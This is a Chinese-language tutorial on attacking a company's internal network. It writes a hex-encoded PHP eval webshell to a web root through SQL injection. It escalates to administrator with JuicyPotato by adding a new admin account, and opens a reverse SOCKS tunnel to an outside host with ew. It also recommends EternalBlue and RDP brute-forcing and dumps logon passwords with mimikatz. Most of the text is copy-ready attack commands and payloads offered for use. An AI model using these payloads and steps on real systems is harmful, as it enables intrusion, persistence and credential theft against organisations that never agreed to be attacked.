内網滲透
我們首先先講一下,如何去利用sql注入漏洞
先講兩個導出檔案的函數
into dumpfile 'C:\\phpstudy\\WWW\\123.txt'//寫檔案的一個函數,後面接路徑
into outfile 'C:\\phpstudy\\WWW\\123.txt'//寫檔案的一個函數,後面接路徑
但是一般都用不了這兩個函數,他和loadfile()一起的,如果能用loadfile() ,那代表這兩個函數也能用
原因是:mysql.ini的配置問題,要手動添加一個配置
select 1,2,3 into dumpfile 'C:\\Users\\Public\\Music\\WWW\\1.txt'
成功生成這1.txt檔案
url編碼就是16進制
比如
可以利用上述函數,在url欄,或者burp中,把這個一句話木馬寫入
!!記住,需要前面加一個0x
select 1,2,0x3c3f706870206576616c28245f524551554553545b385d293f3e into dumpfile 'C:\\Users\\Public\\Music\\WWW\\1.txt'//記住要寫兩個\\,或者記住要用這個斜杠/
提權
首先:
介紹幾條有用的cmd指令:
whoami 檢視目前使用者權限
netstat -ano 檢視本機開放的端口
tasklist 檢視本機運作的程式[類似于任務管理器]
systeminfo 檢視計算機資訊
常見的手法是利用windows的漏洞:
檢視windows打了什麼更新檔,然後對應去找以下提權工具
提權輔助頁面: https://bugs.hacking8.com/tiquan/
檢視到的更新檔号填入,然後點選查詢就可以,然後告訴你哪些漏洞可以用,直接去找這個微軟編号的利用工具
這裡分享一個,我喜歡用的工具叫做爛洋芋。juicypotato,關于其中的原理我就不分析了,因為提權工具有各種各樣的,而且Windows作業系統的漏洞,如果不是專門研究的,其實不容易分析講解
下載下傳位址:https://github.com/ohpe/juicy-potato/releases
一般來說Github上面的更新檔,會給源碼的就不太會有後門。
這個東西百分百報毒,建議虛拟機下載下傳或者是加個信任之類的。[直接怎麼免殺,暫時就不考慮]
原版的比較複雜指令,需要寫複雜指令:
JuicyPotato.exe -t t -p c:\windows\system32\cmd.exe -l 1111 -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}
裡面又是涉及很多東西,而且運作了的cmd,還是出現在管理者界面,去操作特别麻煩,是以我給大家提供魔改版的爛洋芋,一條指令就可以了。
JuicyPotato.exe -p "whomai"//""裡面輸入你想要去執行的指令
下面是詳細的提權過程
**1.**直接利用菜刀,拿下權限後,進入虛拟終端,輸入這兩個指令
JuicyPotato.exe -p "net user nf 密碼 /add"//建立使用者名
JuicyPotato.exe -p "net localgroup administrators nf /add"//将使用者添加到管理者組權限
然後他就添加成功了,成功擷取了管理者權限
**2.**然後我們打開遠端桌面,嘗試進行3389連接配接
發現和我們這台的網站主機不一樣,我們測試的時候,是2008r2的伺服器,但是連3389的時候,卻是2003r2的伺服器
這是因為一個公網ip記憶體在N多台機器
如何去通路内網端口呢?隻能通過端口轉發、映射
*
一個網站一般在目标的内網内,然後他開放的端口,是依靠路由器轉發出去的,使用者通路公網ip的一個端口->然後路由器接受到有人通路了這個端口,根據轉發規則配置設定到内網機器=>内網機器連接配接
*
我們一般用 netstat -ano 看到的是内網端口
但是如果轉發規則裡面不轉發,我們怎麼也通路不到,而且黑路由器也比較難
**是以我們一般會反向連接配接,來連接配接我們公網上的一個端口,然後構成連接配接
**
這裡如果有公網ip就不說了,直接全端口映射,是以我們主要講沒公網ip的情況,這裡給大家介紹一款白嫖工具
https://qydev.com/index.html
利用花生殼去擷取公網ip
然後他會開放一個公網ip的端口,來對應我們本地的一個端口
這樣我們就擷取到了公網ip
3.
當我們擷取了公網ip後,我們可以利用一款工具ew,這是最正統的端口轉發、内網穿透
最常用的指令:
建立反向代理 ew -s rssocks -d 1.1.1.1 -e 8888 将自己反向連接配接到 1.1.1.1的8888端口
JuicyPotato.exe -p "ew -s rssocks -d 1.1.1.1 -e 8888"//利用爛洋芋工具進行提權,通路指令
接受代理,ew -s rcsocks -l 1080 -e 8888 監聽8888端口,将擷取的資料轉發到1080端口
當我們連接配接成功過後,就直接利用Proxifier這個工具
我們進入這個工具
改一個配置就可以了
端口是我們之前監聽的那個端口,配置完成,我們就可以直接連接配接内網啦,可以登陸内網機器的3389了
當我們成功進入内網的時候,我們首先需要做的一件事就是資訊收集啦
-
我們可以進行端口掃描,上傳一個nmap
然後開始翻一翻本機裡面的檔案,看看有沒有有用的東西
然後根據端口去尋找問題
- 例如我們現在想對10.0.1.5測試,很明顯他開了這些端口,就針對這些端口測試。
-
例如這裡有開放了445端口,445有個内網大殺器永恒之藍
開了3389,3389可以嘗試爆破登陸,或者打windows rdp漏洞,直接拿下。
如果有WEB就走WEB測試的道路。
- 内網很多情況是這樣的,内網很多機器,但是管理者可能就是那麼幾個人,是以各個機器的使用者賬号密碼相同的可能性極高,那麼我們如果能擷取本機所有使用者的密碼,就可以看到管理者原本設定的密碼。
最後講一個工具猕猴桃mimikatz
兩條指令
windows2012/2016不能抓
privilege::debug //提升權限
sekurlsa::logonpasswords //從記憶體中抓取密碼
log//将抓取的資料儲存到桌面的檔案裡